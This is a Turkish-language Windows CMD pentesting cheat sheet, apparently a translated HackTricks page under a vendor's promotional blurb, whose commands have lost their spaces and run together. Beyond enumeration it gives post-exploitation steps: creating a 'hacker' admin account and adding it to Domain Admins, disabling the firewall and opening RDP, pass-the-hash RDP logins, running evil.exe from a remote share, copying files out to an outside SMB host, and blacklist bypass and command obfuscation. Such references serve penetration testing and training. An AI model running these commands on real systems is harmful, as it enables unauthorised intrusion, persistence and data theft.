Web uygulamalarınız, ağınız ve bulutunuz hakkında bir hacker perspektifi edinin
Gerçek iş etkisi olan kritik, istismar edilebilir güvenlik açıklarını bulun ve raporlayın. Saldırı yüzeyini haritalamak, ayrıcalıkları artırmanıza izin veren güvenlik sorunlarını bulmak ve temel kanıtları toplamak için otomatik istismarları kullanmak için 20'den fazla özel aracımızı kullanın, sıkı çalışmanızı ikna edici raporlara dönüştürün.
Sistem bilgisi
Sürüm ve Yamanın bilgileri
wmicosgetosarchitecture||echo%PROCESSOR_ARCHITECTURE%#Get architecturesysteminfosysteminfo|findstr/B/C:"OS Name"/C:"OS Version"#Get only that informationwmiccomputersystemLISTfull#Get PC infowmicqfegetCaption,Description,HotFixID,InstalledOn#Patcheswmicqfelistbrief#UpdateshostnameDRIVERQUERY#3rd party driver vulnerable?
Ortam
set#List all environment variables
Bazı çevresel değişkenleri vurgulamak için:
COMPUTERNAME: Bilgisayarın adı
TEMP/TMP: Geçici klasör
USERNAME: Kullanıcı adınız
HOMEPATH/USERPROFILE: Ana dizin
windir: C:\Windows
OS: Windows OS
LOGONSERVER: Etki alanı denetleyicisinin adı
USERDNSDOMAIN: DNS ile kullanılacak etki alanı adı
USERDOMAIN: Etki alanının adı
nslookup%LOGONSERVER%.%USERDNSDOMAIN%#DNS request for DC
schtasks/query/foLIST/v#Verbose out of scheduled tasksschtasks/query/foLIST2>nul|findstrTaskNameschtasks/query/foLIST/v>schtasks.txt; catschtask.txt|grep"SYSTEM\|Task To Run"|grep-B1SYSTEMtasklist/V#List processestasklist/SVC#links processes to started servicesnetstart#Windows Services startedwmicservicelistbrief#List servicesscquery#List of servicesdir/a"C:\Program Files"#Installed softwaredir/a"C:\Program Files (x86)"#Installed softwareregqueryHKEY_LOCAL_MACHINE\SOFTWARE#Installed software
Alan bilgisi
# Generic AD infoecho%USERDOMAIN%#Get domain nameecho%USERDNSDOMAIN%#Get domain nameecho%logonserver%#Get name of the domain controllersetlogonserver#Get name of the domain controllersetlog#Get name of the domain controllergpresult/V# Get current policy appliedwmicntdomainlist/format:list#Displays information about the Domain and Domain Controllers# Usersdsqueryuser#Get all usersnetuser/domain#List all users of the domainnetuser<ACCOUNT_NAME>/domain#Get information about that usernetaccounts/domain#Password and lockout policywmic useraccount list /format:list #Displays information about all local accounts and any domain accounts that have logged into the device
wmic/NAMESPACE:\\root\directory\ldapPATHds_userGETds_samaccountname#Get all userswmic/NAMESPACE:\\root\directory\ldapPATHds_userwhere"ds_samaccountname='user_name'"GET# Get info of 1 userswmic sysaccount list /format:list # Dumps information about any system accounts that are being used as service accounts.
# Groupsnetgroup/domain#List of domain groupsnet localgroup administrators /domain #List uses that belongs to the administrators group inside the domain (the group "Domain Admins" is included here)
netgroup"Domain Admins"/domain#List users with domain admin privilegesnetgroup"domain computers"/domain#List of PCs connected to the domainnetgroup"Domain Controllers"/domain#List PC accounts of domains controllerswmicgrouplist/format:list# Information about all local groupswmic/NAMESPACE:\\root\directory\ldapPATHds_groupGETds_samaccountname#Get all groupswmic /NAMESPACE:\\root\directory\ldap PATH ds_group where "ds_samaccountname='Domain Admins'" Get ds_member /Value #Members of the group
wmic path win32_groupuser where (groupcomponent="win32_group.name="domain admins",domain="DOMAIN_NAME"") #Members of the group
# Computersdsquerycomputer#Get all computersnetview/domain#Lis of PCs of the domainnltest/dclist:<DOMAIN>#List domain controllerswmic/NAMESPACE:\\root\directory\ldapPATHds_computerGETds_samaccountname#All computerswmic/NAMESPACE:\\root\directory\ldapPATHds_computerGETds_dnshostname#All computers# Trust relationsnltest/domain_trusts#Mapping of the trust relationships# Get all objects inside an OUdsquery*"CN=Users,DC=INLANEFREIGHT,DC=LOCAL"
Günlükler ve Olaylar
#Make a security query using another credentialswevtutilqesecurity/rd:true/f:text/r:helpline/u:HELPLINE\zachary/p:0987654321
Kullanıcılar ve Gruplar
Kullanıcılar
#Mewhoami/all#All info about me, take a look at the enabled tokenswhoami/priv#Show only privileges# Local usersnetusers#All usersdir/b/ad"C:\Users"netuser%username%#Info about a user (me)netaccounts#Information about password requirementswmicUSERACCOUNTGetDomain,Name,Sidnetuser/add [username] [password] #Create user# Other users loogedqwinsta#Anyone else logged in?#Lauch new cmd.exe with new creds (to impersonate in network)runas/netonly/user<DOMAIN>\<NAME>"cmd.exe"::Thepasswordwillbeprompted#Check current logon session as administrator using logonsessions from sysinternalslogonsessions.exelogonsessions64.exe
Gruplar
#Localnetlocalgroup#All available groupsnetlocalgroupAdministrators#Info about a group (admins)netlocalgroupadministrators [username] /add #Add user to administrators#Domainnetgroup/domain#Info about domain groupsnetgroup/domain<domain_group_name>#Users that belongs to the group
Oturumları listele
qwinsta
klist sessions
Şifre Politikası
net accounts
Kimlik Bilgileri
cmdkey/list#List credentialvaultcmd/listcreds:"Windows Credentials"/all#List Windows vaultrundll32keymgr.dll,KRShowKeyMgr#You need graphical access
Kullanıcılarla Süreklilik
# Add domain user and put them in Domain Admins groupnetuserusernamepassword/ADD/DOMAINnetgroup"Domain Admins"username/ADD/DOMAIN# Add local user and put them local Administrators groupnetuserusernamepassword/ADDnetlocalgroupAdministratorsusername/ADD# Add user to insteresting groups:netlocalgroup"Remote Desktop Users"UserLoginName/addnetlocalgroup"Debugger users"UserLoginName/addnetlocalgroup"Power users"UserLoginName/add
Ağ
Arayüzler, Yollar, Portlar, Ana Bilgisayarlar ve DNS Önbelleği
ipconfig/all#Info about interfacesrouteprint#Print available routesarp-a#Know hostsnetstat-ano#Opened ports?typeC:\WINDOWS\System32\drivers\etc\hostsipconfig/displaydns|findstr"Record"|findstr"Name Host"
Güvenlik Duvarı
netshfirewallshowstate# FW info, open portsnetshadvfirewallfirewallshowrulename=allnetshfirewallshowconfig# FW infoNetshAdvfirewallshowallprofilesNetShAdvfirewallsetallprofilesstateoff#Turn OffNetShAdvfirewallsetallprofilesstateon#Trun Onnetshfirewallsetopmodedisable#Turn Off#How to open portsnetshadvfirewallfirewalladdrulename="NetBIOS UDP Port 138"dir=outaction=allowprotocol=UDPlocalport=138netshadvfirewallfirewalladdrulename="NetBIOS TCP Port 139"dir=inaction=allowprotocol=TCPlocalport=139netshfirewalladdportopeningTCP3389"Remote Desktop"#Enable Remote Desktopreg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netshfirewalladdportopeningTCP3389"Remote Desktop"::netshfirewallsetserviceremotedesktopenable#I found that this line is not needed::scconfigTermServicestart=auto#I found that this line is not needed::netstartTermservice#I found that this line is not needed#Enable Remote Desktop with wmicwmicrdtogglewhereAllowTSConnections="0"callSetAllowTSConnections"1"##orwmic/node:remotehostpathWin32_TerminalServiceSettingwhereAllowTSConnections="0"callSetAllowTSConnections"1"#Enable Remote assistance:regadd“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer”/vfAllowToGetHelp/tREG_DWORD/d1/fnetshfirewallsetserviceremoteadminenable#Ninja combo (New Admin User, RDP + Rassistance + Firewall allow)net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable
::ConnecttoRDP (using hashorpassword)xfreerdp/u:alice/d:WORKGROUP/pth:b74242f37e47371aff835a6ebcac4ffe/v:10.11.1.49xfreerdp/u:hacker/d:WORKGROUP/p:Hacker123!/v:10.11.1.49
Paylaşımlar
netview#Get a list of computersnetview/all/domain [domainname] #Shares on the domainsnetview \\computer/ALL#List shares of a computernetusex: \\computer\share#Mount the share locallynetshare#Check current shares
cd#Get current dircdC:\path\to\dir#Change dirdir#List current dirdir/a:hC:\path\to\dir#List hidden filesdir/s/b#Recursive list without shittime#Get current timedate#Get current dateshutdown/r/t0#Shutdown nowtype<file>#Cat file#Runasrunas/savecred/user:WORKGROUP\Administrator"\\10.XXX.XXX.XXX\SHARE\evil.exe"#Use saved credentialsrunas/netonly/user:<DOMAIN>\<NAME>"cmd.exe"::Thepasswordwillbeprompted#Hideattrib+hfile#Set Hiddenattrib-hfile#Quit Hidden#Give full control over a file that you ownsicacls<FILE_PATH>/t/e/p<USERNAME>:Ficacls<FILE_PATH>/e/r<USERNAME>#Remove the permision#Recursive copy to smbxcopy/hievryC:\Users\security\.yawcam \\10.10.14.13\name\win#exe2bat to transform exe file in bat file#ADSdir/r#Detect ADSmorefile.txt:ads.txt#read ADSpowershell (Get-Content file.txt-Streamads.txt)# Get error messages from codenethelpmsg32#32 is the code in that case
Karakter Siyah Listelemeyi Atlatma
echo%HOMEPATH:~6,-11%#\who^ami#whoami
DOSfuscation
Obfuscate edilmiş bir CMD satırı oluşturur
git clone https://github.com/danielbohannon/Invoke-DOSfuscation.gitcd Invoke-DOSfuscationImport-Module .\Invoke-DOSfuscation.psd1Invoke-DOSfuscationhelpSET COMMAND type C:\Users\Administrator\Desktop\flag.txtencoding